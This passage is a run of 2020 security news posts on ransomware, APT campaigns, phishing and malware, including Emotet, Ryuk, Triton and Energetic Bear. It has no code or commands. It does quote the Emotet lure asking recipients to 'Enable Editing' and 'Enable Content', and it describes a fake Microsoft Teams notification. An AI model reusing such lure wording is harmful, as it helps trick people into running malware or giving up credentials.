Finnish media reported that crooks are demanding ransoms of 200 euros worth of Bitcoin, the ransom amount will increase up to 500 euros if the victim will not pay it within 24 hours. Crooks also attempted to directly blackmail Vastaamo asking for a 450,000 euros ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, Vastaamo)

The post Finnish psychotherapy center Vastaamo suffered a shocking security breach appeared first on Security Affairs.

Ransomware attack disabled Georgia County Election database

A ransomware attack recently hit Georgia county government and reportedly disabled a database used to verify voter signatures.

A ransomware attack hit a Georgia county government early this month and disabled a database used to verify voter signatures in the authentication of absentee ballots. It is a common process to validate absentee ballots sent by mail by analyzing signatures.

The media pointed out that this is the first reported case of a ransomware attack against a system used in the incoming 2020 Presidential election.

Ransomware attacks could have a dramatic impact on the elections, they could disrupt voting systems and raise doubts about the validity of the vote.

The attack took place on October 7, it hit Hall County, in the northern part of the state and it disabled the county’s voter signature database.

“One of the databases the county uses to verify voter signatures on absentee ballots is not working after some county network outages due to a ransomware attack on Oct. 7.” reported the Gainesville Times. “Registration Coordinator Kay Wimpye with the county elections office said employees can still verify voter signatures by manually pulling hard copies of voter registration cards, which is more time-consuming. Most voter signatures can be verified using a state database that has been unaffected by the outages, she said.”

The media reported that the Hall County attack was carried out by Doppelpaymer ransomware operators that also leaked stolen data on their dark web leak site to force the organization to pay the ransom.

The county website published an update to announce that the attack did not impact the voting process for citizens, a situation that is differed from the scenario reported by the Times.

Pierluigi Paganini

(SecurityAffairs – hacking, Georgia county)

The post Ransomware attack disabled Georgia County Election database appeared first on Security Affairs.

COVID-19 vaccine manufacturer suffers a data breach

Dr. Reddy’s, the Indian contractor for Russia’s “Sputinik V” COVID-19 vaccine was hit with a cyber-attack that forced the company to close its plants.

Indian COVID-19 vaccine manufacturer Dr. Reddy’s Laboratories was hit with a cyber attack that forced it to shut down its plants in Brazil, India, Russia, the U.K., and the U.S..

According to The Economic Times the company suffered a data breach.

The Indian company is the contractor for Russia’s “Sputinik V” COVID-19 vaccine, recently the Drug Control General of India (DCGI) gave it the authorization to enter Phase 2 human trials.

According to the BBC, the phone lines at the company’s UK sites in Cambridgeshire and Yorkshire were down.

In response to the security breach, the COVID-19 vaccine manufacturer has isolated all data center services.

“In the wake of a detected cyber-attack, we have isolated all data center services to take required preventive actions,” CIO Mukesh Rathi said in a media statement. “We are anticipating all services to be up within 24 hours, and we do not foresee any major impact on our operations due to this incident.”

According to the media, the attack is likely the result of a cyber espionage operation aimed at stealing info on the COVID-19 vaccine development.

At the time it is not clear whether the attack was carried out by a nation-state actor or a cyber crime gang.

In July, the British National Cyber Security Centre revealed that Russia-linked group APT29 is conducting cyberespionage campaigns targeting UK, US, and Canadian organizations working of the development of a COVID-19 vaccine.

In the same period, the US Justice Department accused two Chinese hackers of stealing trade secrets from companies worldwide and recently involved in attacks against firms developing a vaccine for the COVID-19.

In September, the El Pais newspaper reported that Chinese hackers have stolen information from Spanish laboratories working on a vaccine for COVID19.

Pierluigi Paganini

(SecurityAffairs – hacking, COVID-19)

The post COVID-19 vaccine manufacturer suffers a data breach appeared first on Security Affairs.

Is the Abaddon RAT the first malware using Discord as C&C?

Abaddon is the first RAT that uses the freeware instant messaging and VoIP app and digital distribution platform Discord as a command & control server.

Researchers from MalwareHunterTeam have spotted a new piece of remote access trojan (RAT) dubbed ‘Abaddon’ that is likely the first malware using the Discord platform as command and control. The Abaddon malware connects to the Discord command and control server to check for new commands to execute.

Experts also warn that the author of the malware also developed a malware feature.

In the past, other threat actors already abused the Discord platform for different purposes, such as using it as a stolen data drop.

“In the past, we have reported on how threat actors use Discord as a stolen data drop or have created malware that modifies the Discord client to have it steal credentials and other information.” reported Bleeping Computer that first reported the news.

Abaddon implements data-stealing feature, it was designed to steal multiple data from the infected host, including Chrome cookies, saved credit cards, and credentials, Steam credentials, Discord tokens and MFA information.

The malware also collects system information such as country, IP address, and hardware information.

According to Bleeping Computer the malware supports the following commands:

  • Steal a file or entire directories from the computer
  • Get a list of drives
  • Open a reverse shell that allows the attacker to execute commands on the infected PC.
  • Launch in-development ransomware (more later on this).
  • Send back any collected information and clear the existing collection of data.

The malicious code connects to the Command & Control every ten seconds for new tasks to execute.

Experts pointed out that the malware also implements the commands to encrypt files of the infected system and decrypt them.

The ransomware feature appears to be under development.

Pierluigi Paganini

(SecurityAffairs – hacking, Abaddon)

The post Is the Abaddon RAT the first malware using Discord as C&C? appeared first on Security Affairs.

Trick or Treat: Avoid These Spooky Threats This Halloween

Halloween scams

Trick or Treat: Avoid These Spooky Threats This Halloween

Spooky season is among us, and ghosts and goblins aren’t the only things hiding in the shadows. Online threats are also lurking in the darkness, preparing to haunt devices and cause some hocus pocus for unsuspecting users. This Halloween season, researchers have found virtual zombies and witches among us – a new trojan that rises from the dead no matter how many times it’s deleted and malicious code that casts an evil spell to steal users’ credit card data.

Let’s unlock the mystery of these threats so you can avoid cyber-scares and continue to live your online life free from worry.

Zombie Malware Hides in the Shadows

Just like zombies, malware can be a challenge to destroy. Oftentimes, it requires a user to completely wipe their device by backing up files, reinstalling the operating system, and starting from scratch. But what if this isn’t enough to stop the digital walking dead from wreaking havoc on your device?

Recently, a new type of Trojan has risen from the dead to haunt users no matter how many times it’s deleted. This zombie-like malware attaches itself to a user’s Windows 10 startup system, making it immune to system wipes since the malware can’t be found on the device’s hard drive. This stealthy malware hides on the device’s motherboard and creates a Trojan file that reinstalls the malware if the user tries to remove it. Once it sets itself up in the darkness, the malware scans for users’ private documents and sends them to an unknown host, leaving the user’s device in a ghoulish state.

Cybercriminals Leave Credit Card Users Spellbound

A malware misfortune isn’t the only thing that users should beware of this Halloween. Cybercriminals have also managed to inject malicious code into a wireless provider’s web platform, casting an evil spell to steal users’ credit card data. The witches and warlocks allegedly responsible for casting this evil spell are part of a Magecart spin-off group that’s known for its phishing prowess.  To pull off this attack, they plated a credit card skimmer onto the wireless provider’s checkout page. This allowed the hackers to exfiltrate users’ credit card data whenever they made a purchase – a spell that’s difficult to break.

Why These Cyberspooks Are Emerging

While these threats might seem like just another Halloween trick, there are other forces at play. According to McAfee’s Quarterly Threats Report from July 2020, threats like malware phishing and trojans have proven opportunistic for cybercriminals as users spend more and more time online – whether it be working from home, distance learning, or connecting with friends and loved ones. In fact, McAfee Labs observed 375 threats per minute in Q1 2020 alone.

So, as hackers continue to adapt their techniques to take advantage of users spending more time online, it’s important that people educate themselves on emerging threats so they can take necessary precautions and live their digital lives free from worry.

How to Stay Protected

Fortunately, there are a number of steps you can take to prevent these threats from haunting your digital life. Follow these tips to keep cybersecurity tricks at bay this spooky season:

Beware of emails from unknown senders

Zombie malware is easily spread by phishing, which is when scammers try to trick you out of your private information or money. If you receive an email from an unknown user, it’s best to proceed with caution. Don’t click on any links or open any attachments in the email and delete the message altogether.

Review your accounts

Look over your credit card accounts and bank statements often to check whether someone is fraudulently using your financial data – you can even sign up for transaction alerts that your bank or credit card company may provide. If you see any charges that you did not make, report it to the authorities immediately.

Use a comprehensive security solution

Add an extra layer of protection with a security solution like McAfee® Total Protection to help safeguard your digital life from malware and other threats. McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files.

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Trick or Treat: Avoid These Spooky Threats This Halloween appeared first on McAfee Blogs.

New Emotet attacks use a new template urging recipients to upgrade Microsoft Word

Emotet operators have started using a new template this week that pretends to be a Microsoft Office message urging a Microsoft Word update.

Researchers this week observed Emotet attacks employing a new template that pretends to be a Microsoft Office message urging the recipient to update their Microsoft Word to add a new feature.

Source Bleeping Computer

Emotet spam messages leverage templates to trick the victims into enabling macros to start the infection.

Upon installing the malware, Emotet will download additional payloads on the machine, including ransomware, and use it to send spam emails.

The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542. In the middle-August, the malware was employed in fresh COVID19-themed spam campaign

Recent spam campaigns used messages with malicious Word documents, or links to them, pretending to be an invoice, shipping information, COVID-19 information, resumes, financial documents, or scanned documents.

The infamous banking trojan is also used to deliver other malicious code, such as Trickbot and QBot trojan or ransomware such as Conti (TrickBot) or ProLock (QBot).

Emotet is a modular malware, its operators could develop new Dynamic Link Libraries to update its capabilities.

Recently, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to warn of a surge of Emotet attacks that have targeted multiple state and local governments in the U.S. since August.

During that time, the agency’s EINSTEIN Intrusion Detection System has detected roughly 16,000 alerts related to Emotet activity.

In a recent campaign observed on October 14th, the attackers are using multiple lures, including invoices, purchase orders, shipping information, COVID-19 information, and information about President Trump’s health.

The spam messages come with malicious Word (.doc) attachments or include links to download the bait document.

“Emotet switched to a new template this week that pretends to be a Microsoft Office message stating that Microsoft Word needs to be updated to add a new feature.” reported BleepingComputer.

Below the messages displayed to the recipient to trick him into opening enabling the macros.

Upgrade your edition of Microsoft WordUpgrading your edition will add new feature to Microsoft Word.
Please click Enable Editing and then click
Enable Content.

Upon enabling the macros, the Emotet malware is downloaded and installed into the victim’s %LocalAppData% folder, as shown below.

“Due to this, it is important that all email users recognize malicious document templates used by Emotet so that you do not accidentally become infected.” concludes Bleeping computer.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post New Emotet attacks use a new template urging recipients to upgrade Microsoft Word appeared first on Security Affairs.

Microsoft Teams phishing campaign targeted up to 50,000 Office 365 users

Experts warn of a phishing campaign that already targeted up to 50,000 Office 365 users with a fake automated message from Microsoft Teams.

Secruity researchers reported that up to 50,000 Office 365 users have been targeted by a phishing campaign that pretends to be automated message from Microsoft Teams. The bait message uses fake notifications of a “missed chat” from Microsoft Teams, the campaigns aims at stealing Office 365 recipients’ login credentials.

Like other collaboration and communications platforms, the popularity of Microsoft Teams has risen since the beginning of the Covid-19 pandemic because a growing number of organizations started using the remote working model. Threat actors are adapting their attack techniques to exploit the ongoing situation, researchers from Abnormal Security observed campaign that hit between 15,000 to 50,000 Office 365 users.

“This attack impersonates an automated message from Microsoft Teams in order to steal recipient’s login credentials.” reads the report published by Abnormal Security. “The email is sent from the display name, ‘There’s new activity in Teams’, making it appear like an automated notification from Microsoft Teams. It appears to notify the recipient that their teammates are trying to reach them and urges the recipient to click on ‘Reply in Teams’. However, this leads to a phishing page.”

The bait email displays the name “There’s new activity in Teams” to trick the victims into believing that it is an automated notification from Microsoft Teams.

The email tells the recipient that they have missed Microsoft Team chats and show an example of a teammate chat that asks them to submit something by Wednesday of next week.

The researchers that the campaing is not targeted in nature as the employee referenced in the chats doesn’t appear to be an employee of the company that was targeted by the attackers.

Recipient could respond to the email by click on the “Reply in Teams” button that is present in the content of the message, but as a consequence of this action, the victim is redirected to a phishing page.

“Within the body of the email, there are three links appearing as ‘Microsoft Teams’, ‘(contact) sent a message in instant messenger’, and ‘Reply in Teams’,” continues the analysis. “Clicking on any of these leads to a fake website that impersonates the Microsoft login page. The phishing page asks the recipient to enter their email and password.”

The phishing landing looks like a Microsoft login page, its URL begins with the “microsftteams” to appear as legitimate.

“The attacker spoofed employee emails and also impersonated Microsoft Teams. The recipient is more likely to fall prey to an attack when it is believed to originate from within the company and also from a trusted brand.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Team)

The post Microsoft Teams phishing campaign targeted up to 50,000 Office 365 users appeared first on Security Affairs.

Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware

The systems at the US-based ski and golf resort operator were infected with the WastedLocker ransomware, the incident impacted reservation systems.

Boyne Resorts is a collection of mountain and lakeside resorts, ski areas, and attractions spanning from British Columbia to Maine.  The company owns and operates eleven properties and an outdoor lifestyle equipment/apparel retail division with stores in cities throughout Michigan.  An industry leader in multiple U.S. regions, operations include snowsports and year-round mountain recreation, golf, an indoor waterpark, spas, food and beverage, lodging and real estate development.

Boyne Resorts was the victim of WastedLocker ransomware attack, the incident has impacted reservation systems.

According to BleepingComputer, the ransomware initially breached the corporate offices and then moved laterally targeting the IT systems of the resorts they operate. As result of the attack the company was forced to shut down portions of its network to prevent the ransomware from spreading.

Customers of the company were not able to make reservations at the resorts operated by the company. .

The ransomware encrypted files and renamed their filenames by adding the “.easy2lock” extension, this extension was previously associated with recent WastedLocker ransomware infections.

In July, Smartwatch and wearable device maker Garmin had to shut down some of its connected services and call centers following a WastedLocker Ransomware attack.

In June, security experts from Symantec reported that at least 31 organizations in the United States have been targeted with the recently discovered WastedLocker ransomware.

Researchers from the NCC Group’s report and later Symantec confirmed that malware was developed by the Russian cybercrime crew known as Evil Corp, which was behind the Dridex Trojan, and multiple ransomware like Locky , Bart, Jaff, and BitPaymer.

Most of the victims belong to the manufacturing industry, followed by IT and media and telecommunications sectors.

This group has been active since at least 2007, in December 2019, the U.S. Treasury Department imposed sanctioned on Evil Corp for causing more than $100 million in financial damages.

The U.S. Department of Justice (DoJ) has charged Russian citizens Maksim V. (32) and Igor Turashev (38) for distributing the infamous Dridex banking Trojan, and for their involvement in international bank fraud and computer hacking schemes.

Ransom payments to WastedLocker is not allowed by US authorities, this means that Boyne Resorts could face severe sanctions if it will pay the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, WastedLocker)

The post Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware appeared first on Security Affairs.

US Treasury imposes sanctions on a Russian research institute behind Triton malware

US Treasury Department announced sanctions against Russia’s Central Scientific Research Institute of Chemistry and Mechanics behind Triton malware.

The US Treasury Department announced sanctions against a Russian research institute for its alleged role in the development of the Triton malware.

“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) designated, pursuant to Section 224 of the Countering America’s Adversaries Through Sanctions Act (CAATSA), a Russian government research institution that is connected to the destructive Triton malware.” reads a press release published by the Department of the Treasury.

Triton is a strain of malware specifically designed to target industrial control systems (ICS) system that has been spotted by researchers at FireEye in December 2017.

The malware was first spotted after it was employed in 2017 in an attack against a Saudi petrochemical plant owned by the privately-owned Saudi company Tasnee. According to the experts, the infection caused an explosion.

“In August 2017, a petrochemical facility in the Middle East was the target of a cyber-attack involving the Triton malware. This cyber-attack was supported by the State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM), a Russian government-controlled research institution that is responsible for building customized tools that enabled the attack.” continues the press release.

The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

“Mandiant recently responded to an incident at a critical infrastructure organization where an attacker deployed malware designed to manipulate industrial safety systems. The targeted systems provided emergency shutdown capability for industrial processes.” reads the analysis published by FireEye in 2017.

“We assess with moderate confidence that the attacker was developing the capability to cause physical damage and inadvertently shutdown operations. This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.”

Triton malware

Once gained access to the SIS system, the threat actor deployed the TRITON malware, a circumstance that indicates that attackers had a knowledge of such systems. According to FireEye the attackers pre-built and tested the tool which would require access to hardware and software that is not widely available. TRITON is also designed to communicate using the proprietary TriStation protocol which is not publicly documented, this implies that the attackers reverse engineered the protocol to carry out the attack.

The Triton malware interacts with Triconex SIS controllers., it is able to read and write programs and functions to and from the controller.

Triton Malware Triconex

The hackers deployed the Triton malware on a Windows-based engineering workstation, the malicious code added its own programs to the execution table. In case of a failure, the malware attempts to return the controller to a running state, it also overwrites the malicious program with junk data if the attempt fails, likely to delete any track of the attack.

The US Treasury Department imposed sanctions on the State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics (also known as CNIIHM or TsNIIKhM).

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a Russian government research institute in Moscow.

FireEye collected strong evidence suggesting that the Russian CNIIHM institute has been involved in the development of some of the tools used in the Triton attack.

“FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post.” reads the analysis published by FireEye.

  1. FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
  2. Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
  3. An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
  4. Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
  5. We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.” 

Experts pointed out that Triton is linked to Russia, the CNIIHM, and an individual located in Moscow. Some of the TEMP.Veles hacking tools were tested using an unnamed online scan service. A specific user of the service who has been active since 2013 has tested various tools across the time.

The user also tested several customized versions of widely available tools, including Metasploit, Cobalt Strike, PowerSploit, the PowerShell-based WMImplant, and cryptcat.

In many cases, the custom versions of the tools were used in TEMP.Veles attacks just days after being submitted to the testing environment.

The experts discovered that a PDB path contained in a tested file included a string that appears to be an online moniker associated with a Russia-based individual active in Russian information security communities since at least 2011.

According to a now-defunct social media profile, the individual was a professor at CNIIHM.

FireEye also discovered that one IP address registered to the Russian research institute was involved in the Triton attacks.

The sanctions prohibit US entities from engaging with CNIIHM and also seize any asset on the US soil belonging to the research institute.

“The Russian Government continues to engage in dangerous cyber activities aimed at the United States and our allies,” said Secretary Steven T. Mnuchin. “This Administration will continue to aggressively defend the critical infrastructure of the United States from anyone attempting to disrupt it.”

TsNIIKhM is being designated pursuant to Section 224 of CAATSA for knowingly engaging in significant activities undermining cybersecurity against any person, including a democratic institution, or government on behalf of the Government of the Russian Federation.” concludes the press release.

“As a result of today’s designation, all property and interests in property of TsNIIKhM that are in or come within the possession of U.S. persons are blocked, and U.S. persons are generally prohibited from engaging in transactions with them. Additionally, any entities 50 percent or more owned by one or more designated persons are also blocked. Moreover, non-U.S. persons who engage in certain transactions with TsNIIKhM may themselves be exposed to sanctions.”

On Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint report that provides details about a hacking campaign of a Russian hacking group known as Energetic Bear.

The EU Council also imposed sanctions on two Russian intelligence officers for their role in the 2015 Bundestag hack.

Pierluigi Paganini

(SecurityAffairs – hacking, Triton)

The post US Treasury imposes sanctions on a Russian research institute behind Triton malware appeared first on Security Affairs.

Flare-On 7 Challenge Solutions

We are thrilled to announce the conclusion of the seventh annual Flare-On challenge. This year proved to be the most difficult challenge we’ve produced, with the lowest rate of finishers. This year’s winners are truly the elite of the elite! Lucky for them, all 260 winners will receive this cyberpunk metal key.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. fidler – Nick Harbour (@nickharbour)
  2. garbage – Jon Erickson
  3. Wednesday – Blaine Stancill (@MalwareMechanic)
  4. report – Moritz Raabe (@m_r_tz)
  5. TKApp – Moritz Raabe (@m_r_tz)
  6. CodeIt – Mike Hunhoff (@mehunhoff)
  7. re_crowd – Chris Gardner, Moritz Raabe, Blaine Stancill
  8. Aardvark – Jacob Thompson
  9. crackinstaller – Paul Tarter (@Hefrpidge)
  10. break – Chris Gardner
  11. Rabbit Hole – Sandor Nemes (@sandornemes)

This year’s Flare-On challenge was the first to feature a live public scoreboard, so players could track their progress and the progress of previous Flare-On challenge champions. Despite this increased data at your fingertips, we are still going to bring you even more stats. As of 11:00am ET, participation was near record setting levels at 5,648 players registered. 3,574 of those players finished at least one challenge.

The U.S. reclaimed the top spot for total finishers with 22. Singapore was once again in second place, but in uncontested first place per capita, with one Flare-On finisher for every 296,000 living persons in Singapore. This is the first year we have included a per capita finishers by country chart, and we did it to highlight just what a remarkable concentration of talent exists in some corners of the world. Consistent top finisher Russia took third place, and a growing player base in Germany and Israel came into full bloom this year, with those countries edging out other frequent top five countries such as China, India and Vietnam.

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11

Threat Roundup for October 16 to October 23

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 16 and October 23. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201023-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 16 to October 23 appeared first on Cisco Blogs.

IoT Device Takeovers Surge 100 Percent in 2020

The COVID-19 pandemic, coupled with an explosion in the number of connected devices, have led to a swelling in IoT infections observed on wireless networks.

Sopra Steria hit by the Ryuk ransomware gang

French IT outsourcer Sopra Steria hit by ‘cyberattack’, Ryuk ransomware suspected

French IT outsourcer Sopra Steria has been hit by a ransomware attack, while the company did not reveal the family of malware that infected its systems, local media speculate the involvement of the Ryuk ransomware.

“A cyber attack was detected on the Sopra Steria computer network on the evening of October 20. Security measures have been taken to limit the risk of propagation.” reads the press release published by the company. “The Group’s teams are fully mobilized to ensure a return to normal as quickly as possible and everything is done to ensure business continuity. Sopra Steria is in close contact with its customers and partners as well as with the competent authorities.”

The European IT firm has 46,000 employees operating in 25 countries worldwide. It provides a wide range of IT services, including software development and consulting.

“According to our sources, the incident started to spread during the course of last night. The Active Directory infrastructure would be affected. And part of the information system would have been encrypted.” reported the website LeMagit. “Two sources tell us that the ransomware involved is none other than Ryuk. Surprise, researcher  JamesWT_MHT  found on VirusTotal a copy of an executable which two sources have confirmed to us is used internally at ESN for the generation of email signatures.”

French authorities are investigating the incident.

Sopra Steria is a member of France’s Cyber Campus, a French initiative to spread cybersecurity awareness, training, and product sales.

The Ryuk ransomware operators were very active early this year, in March they targeted hospitals even as these organizations are involved in the fight against the Coronavirus pandemic.

In September, the Universal Health Services (UHS) healthcare providers has reportedly shut down systems at healthcare facilities after a Ryuk ransomware attack.

In March, the City of Durham shut down its network after Ryuk Ransomware attack.

A few days before, EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, has been hit by the Ryuk ransomware.

The list of the victims of the Ryuk ransomware is very long and includes the US government contractor Electronic Warfare Associates (EWA), US railroad company Railworks, Croatian petrol station chain INA Group, and parts manufacturer Visser Precision.

Pierluigi Paganini

(SecurityAffairs – hacking, Sopra Steria)

The post Sopra Steria hit by the Ryuk ransomware gang appeared first on Security Affairs.

Iran-Linked Seedworm APT target orgs in the Middle East

The Iran-linked cyber espionage group tracked as Seedworm started using a new downloader and is conducting destructive attacks.

The Iran-linked cyber-espionage group Seedworm (aka MuddyWater MERCURY, and Static Kitten) was observed using a new downloader in a new wave of attacks. Security experts pointed out that the threat actor started conducting destructive attacks.

Also referred to as MuddyWater, MERCURY, and Static Kitten, the cyber-espionage group was initially analyzed in 2017.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

Earlier this month, the Iranian APT group was observed actively targeting the Zerologon flaw.

According to security firm ClearSky and Symantec, Seedworm recently started using a new downloader dubbed PowGoop. Experts noticed that the threat actors used the downloader to deliver the Thanos ransomware in an attack aimed at an organization in the Middle East.

“PowGoop is a loader that was exposed in a PaloAlto report and later used in Operation Quicksand. PowGoop is comprised of a DLL Loader and a PowerShell-based downloader.” reads the report published by ClearSky. “The malicious file impersonates a legitimate goopdate.dll file that is signed as a Google Update executable”

The experts observed the attacks between July 6 and July 9, 2020, the hackers employed a strain of ransomware that was able to evade security tools and that implemented a destructive feature by overwriting the MBR.

Experts pointed out that the primary objectives of previous MuddyWater campaigns were espionage and cyber espionage, but in the latest campaign, tracked as ‘Operation Quicksand’ threat actors used for the first time the destructive malware in attacks on prominent organizations in Israel and in other countries around the world.

“We assess that the group is attempting to employ destructive attacks (the likes of the NotPetya attack from 2017), via a disguised as ransomware attacks” continnues the report.

“Although we didn’t see execution of the destruction in the wild, due to the presence of the destructive capabilities, the attribution to nation-state sponsored threat actor, and the realization of this vector in the past, a destructive purpose is more likely than a ransomware that is being deployed for financial goals.”

Another report published by Symantec connected the dots between MuddyWater and the PowGoopdownlaoder.

“In several recent Seedworm attacks, PowGoop was used on computers that were also infected with known Seedworm malware (Backdoor.Mori). In addition to this, activity involving Seedworm’s Powerstats (aka Powermud) backdoor appears to have been superseded by DLL side-loading of PowGoop.” reads the report published by Symantec.

“Additionally, during PowGoop activity, we also observed the attackers downloading tools and some unknown content from GitHub repos, similar to what has been reported on Seedworm‘s Powerstats in the past.”

Symantec researchers noticed that on the same machine where Seedworm was active, the attackers deployed the PowGoop downloader which is known to be a malware that is part of Seedworm’s arsenal.

PowGoop appears to have been employed in attacks aimed at governments, education, oil and gas, real estate, technology, and telecoms organizations in Afghanistan, Azerbaijan, Cambodia, Iraq, Israel, Georgia, Turkey, and Vietnam.

Symantec’s analysis revealed that the PowGoop was masquerading as a Google tool and noticed the use of SSF and Chisel.

Experts speculate the PowGoop downloader might be an evolution of Powerstats tool employed by MuddyWater in previous attacks.

“Symantec has not found any evidence of a wiper or ransomware on computers infected with PowGoop.”Symantec concludes. “This suggests that either the simultaneous presence of PowGoop and Thanos in one attack was a coincidence or, if the two are linked, that PowGoop is not used exclusively to deliver Thanos,”

Pierluigi Paganini

(SecurityAffairs – hacking, Seedworm)

The post Iran-Linked Seedworm APT target orgs in the Middle East appeared first on Security Affairs.

FBI and CISA joint alert blames Russia’s Energetic Bear APT for US government networks hack

The US government declared that Russia-linked APT group Energetic Bear has breached US government networks and exfiltrated data.

A joint security advisory published by The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) revealed that Russia-linked APT group Energetic Bear has breached US government networks and exfiltrated data.

The Energetic Bear APT group (aka DragonFlyCrouching Yeti, TEMP.Isotope, Berserk Bear, TeamSpy, Havex, Koala). has been active since at least 2010 most of the victims of the group are organizations in the energy and industrial sectors.

In March 2018, the Department of Homeland Security and Federal Bureau of Investigation issued a joint technical alert to warn of attacks on US critical infrastructure powered by Russian threat actors. The US-CERT blamed the APT group tracked as DragonflyCrouching Yeti, and Energetic Bear.

This joint advisory provides information on Russia-linked APT actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. 

Officials said the group has been targeting dozens of US state, local, territorial, and tribal (SLTT) government networks since at least February 2020.

Energetic Bear successfully compromised the infrastructure and as of October 1, 2020, exfiltrated data from at least two victim servers.

“Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets.” reads the advisory. “The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.”

The Russian-sponsored APT actor uses previously obtained user and administrator credentials to access the target network and then perform lateral movement to locate high-value assets and exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to sensitive network configurations and passwords, standard operating procedures (SOP), IT instructions, such as requesting password resets, vendors and purchasing information. printing access badges.

This advisory updates another joint CISA-FBI cybersecurity advisory, which warned of attackers combining VPN and Windows Zerologon flaws to target government networks.

The new advisory attributes the cyber attacks to the Russian threat actor and included technical details about the Energetic Bear’s TTPs.

The state-sponsored hackers scanned for vulnerable Citrix (CVE-2019-19781) and Microsoft Exchange services (CVE-2020-0688) and identified vulnerable installs for future exploitation.

According to the technical advisory, Russian hackers used publicly known vulnerabilities to breach networking gear, pivot to internal networks, elevate privileges, and steal sensitive data.

Hackers also targeted Exim mail agents (CVE 2019-10149) and Fortinet SSL VPNs (CVE-2018-13379).

Once gained access to the target networks, Russian hackers moved laterally exploiting the Zerologon vulnerability in Windows Servers (CVE-2020-1472) to access and steal Windows Active Directory (AD) credentials to take over the target’s internal network.

“To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence US policies and actions, or to delegitimize SLTT government entities,” continues the alert.

“As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised.”

Pierluigi Paganini

(SecurityAffairs – hacking, Energetic Bear)

The post FBI and CISA joint alert blames Russia’s Energetic Bear APT for US government networks hack appeared first on Security Affairs.

US whistleblower Edward Snowden received permanent residency by Russian authorities

The popular US whistleblower Edward Snowden has been granted permanent residency in Russia, the announcement was made by his lawyer.

